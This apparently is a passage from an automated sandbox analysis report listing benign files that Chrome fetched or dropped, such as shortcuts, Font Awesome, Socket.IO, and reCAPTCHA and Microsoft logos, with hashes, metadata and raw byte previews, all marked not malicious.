                                                                Entropy (8bit):4.008056842078195
                                                                Encrypted:false
                                                                SSDEEP:48:8rdh2TBSoAHaidAKZdA14meh7sFiZUkmgqeh7sMy+BX:8H2dtbnmy
                                                                MD5:D91DF1FBAE0234C23C4AD72A85CFE60B
                                                                SHA1:5413BFF5144B3FD6E974189B8756427364ADCC31
                                                                SHA-256:A312254BE6B2B5F31E97CFE5DEA210898F462F8B9A7F98A1903907F6093D09DA
                                                                SHA-512:93418A44FC2620D4B92D645C6671E10AA387D3C2DD3C9D368635FDA43BD5DBB8121AF26D37D0354A09F2D7CEE29866CBB83294C979F5D4C19486A7AA067A3AF6
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 19:39:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.992173869495668
                                                                Encrypted:false
                                                                SSDEEP:48:8UAdh2TBSoIHaidAKZdA1TehDiZUkwqehey+R:852dtkky
                                                                MD5:14D916A25ED6A71A975F8B588D6A9D6D
                                                                SHA1:74F5E6712C708D3D6C857C34E46D45117353AF1E
                                                                SHA-256:AF0FFC31FC4D731619A1D725B49306F28CBEB390FF294E8DBF94719AE7863911
                                                                SHA-512:493E73446596B59F742226BD77B473B8A3FB2825B5D8530BAB7BCE56866DC7B34458559A568A8F48515F6B8064FC50262DDAF2F671E6D1FD1E1B910CE4D46DF4
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,......q6U1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 19:39:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.9807457203169725
                                                                Encrypted:false
                                                                SSDEEP:48:8Udh2TBSoIHaidAKZdA1dehBiZUk1W1qehoy+C:802dtE9Iy
                                                                MD5:0404255ABBD5301FDC452269A473A26D
                                                                SHA1:10D0FA2E9A591B9029BDF882E1D570D3BC5F5515
                                                                SHA-256:8E9E2CD448C4681419D41A062EDA4054B476B8F2FD79289779C6A8C7AC7D2C5A
                                                                SHA-512:364E00E029B11363C17AF85D7F36884E2521CDA1E494F8366C2B843FFE8871F58C6E6772EAC2A39C82B8D0F0C6F90809B69CC2967278FCB6152F16DBCA853C00
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,....u.}6U1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 7 19:39:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2679
                                                                Entropy (8bit):3.987329779619049
                                                                Encrypted:false
                                                                SSDEEP:48:8zdh2TBSoIHaidAKZdA1duTeehOuTbbiZUk5OjqehOuTbmy+yT+:8v2dt2TfTbxWOvTbmy7T
                                                                MD5:015311CB52190046F4BC9E387DBC325C
                                                                SHA1:5C0DAE7E2EDCEC97132CD36F501111DFCF6DA01A
                                                                SHA-256:68AFA6E1F8A094E559CC5C3191BF97AC92E7C007B73E805A13B4FBBE6CD47CA9
                                                                SHA-512:D314639CEEF1CF79C51FE30E37250A3A2C176242C782F9729B8572351D928589471FF5900AD198136C4D50CE19FAAE52CA2D91B841F7E857EE2987916DA0DD69
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:L..................F.@.. ...$+.,....:.h6U1..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IgY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65317)
                                                                Category:downloaded
                                                                Size (bytes):100782
                                                                Entropy (8bit):4.782445110770722
                                                                Encrypted:false
                                                                SSDEEP:1536:mUMVM6MVMkMVM9MVMNMVMispLudL+P8Wcn0Fwib3ePyUHsE+z:hudL25cn0FfePyUME+z
                                                                MD5:6386FB409D4A2ABC96EEE7BE8F6D4CC4
                                                                SHA1:09102CFC60EFB430A25EE97CEE9A6A35DF6DFC59
                                                                SHA-256:0DF5A33710E433DE1F5415B1D47E4130CA7466AEE5B81955F1045C4844BBB3ED
                                                                SHA-512:29F91FC180EC2E4225C10A7A2C59E5F3335D2C6C6EF58000D50BF020D92CE0F85C125412BEA73254B2C3F5A3215DDD77B908E85ED10A368B0E59A66A5E07A5D2
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                                Preview:/*!. * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                Category:dropped
                                                                Size (bytes):2407
                                                                Entropy (8bit):7.900400471609788
                                                                Encrypted:false
                                                                SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                                MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                Category:dropped
                                                                Size (bytes):276
                                                                Entropy (8bit):7.316609873335077
                                                                Encrypted:false
                                                                SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                Malicious:false
                                                                Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 105536, version 769.768
                                                                Category:downloaded
                                                                Size (bytes):105536
                                                                Entropy (8bit):7.989150976486913
                                                                Encrypted:false
                                                                SSDEEP:3072:cBrlv6vs2sSSF2Hv2/V49i7iM6wYyXuJwzO:cBrlvyVsSSFeWV49SiM6kaoO
                                                                MD5:CD2B4095E9CE66CDE642C3502A4022D9
                                                                SHA1:A280ECDDDD14695FAD22599301AB03ADFE5224C0
                                                                SHA-256:404C746C8F7E3F9B7611A8F23D908C1A32A5C972236B9D89BB68B05D9BF4B905
                                                                SHA-512:062782597F37B964A5F285FE8B75AC2CC57E99024FA6C9BF841DC2E7B930CE6CFC12EA5F32D2A6B7301A74FFBB552457A2A82ED9D945E135D8B027F506BF5D77
                                                                Malicious:false
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2
                                                                Preview:wOF2.......@.....................................8.$. .`..P..H....T.. . ..WQg......V?..H.I...U.:1....~..?................s...y..*...Y.KEF.......SQ.R].H.H@.oa.....~?..{&@g6i..a...U...z5...x...<........I........,.".....W.7v.$v...t..F]...X.X[..k..su.O.<.......V./.z..;.\....=y7.....]B.8.$`.Y.3....uTT.0.5..7~1...y~........WU.tWM.m....i@.A.-...l'..!.80!..q.'@h?t..Q.-........._.O.S.t..-.b...>..NE$c..O..AT....w .H.A..yK6..PYQ...c.%......}..i.6..X......:.D{...{...}....@.>P........P|.......Ud.BQ.^%.f.%M.b..R...h.j.PUk.....l....c..".....5Kn....Jc.&..&..."..9.....Q`........m.E...:M......\..yIMdZ]..].I..*...#t.shk.u.. .Ld.]{..&......3.UE.PG.0(..6`....B..7<j]....6....z.......\.$l....6BQ..WU...y?[....Unb.....K}T.........p..Z.t.....u..1..._.h).z..m.=`.....p.........{~...i..r.s........v.m|..c0..f.:..1...l..Y....>.........C..O...Xf.K....I...|...Y..=.e.0...^+.w...2....+L......"..X/.~:_..m/.o..B..4.LJ.'..3....f.N..;-9#..e:.J.a;K.9*.I....T.w=.0.....n.K.t..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                Category:dropped
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.8613342322590265
                                                                Encrypted:false
                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                Malicious:false
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (49854)
                                                                Category:dropped
                                                                Size (bytes):49993
                                                                Entropy (8bit):5.216475744251136
                                                                Encrypted:false
                                                                SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                                MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                                SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                                SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                                SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                                Malicious:false
                                                                Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                Category:dropped
                                                                Size (bytes):199
                                                                Entropy (8bit):6.766983163126765
                                                                Encrypted:false
                                                                SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                MD5:21B761F2B1FD37F587D7222023B09276
                                                                SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                Malicious:false
                                                                Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (49854)
                                                                Category:downloaded
                                                                Size (bytes):49993
                                                                Entropy (8bit):5.216475744251136
                                                                Encrypted:false
                                                                SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                                MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                                SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                                SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                                SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                                Malicious:false
                                                                URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                                Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):2228
                                                                Entropy (8bit):7.82817506159911
                                                                Encrypted:false
                                                                SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                Malicious:false
                                                                URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                Category:downloaded
                                                                Size (bytes):1435
                                                                Entropy (8bit):7.8613342322590265
                                                                Encrypted:false
                                                                SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                Malicious:false
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1636
                                                                Entropy (8bit):4.214613323368661
                                                                Encrypted:false
                                                                SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                Malicious:false
